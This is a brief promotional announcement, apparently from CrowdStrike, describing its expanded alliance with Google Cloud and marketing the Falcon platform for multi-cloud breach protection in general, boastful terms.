CrowdStrike: Built to Protect Businesses in the Cloud

Our expanded strategic alliance with Google marks a significant milestone for cloud security. The powerful combination of AI-powered cloud services from Google Cloud and the unified protection and threat hunting capabilities of the AI-native CrowdStrike Falcon platform provides the security that organizations need to stop breaches in multi-cloud and multi-vendor environments.

As cloud threats and technology continue to evolve, staying ahead of threats is paramount. Modern businesses need a powerful and leading ally to protect their cloud-based resources, applications and data as their reliance on cloud technology continues to grow. This industry-defining synergy between CrowdStrike and Google Cloud — both leaders in their own right — will shape the future of cloud technology and security, setting a new standard for protecting today’s cloud environments.

Additional Resources
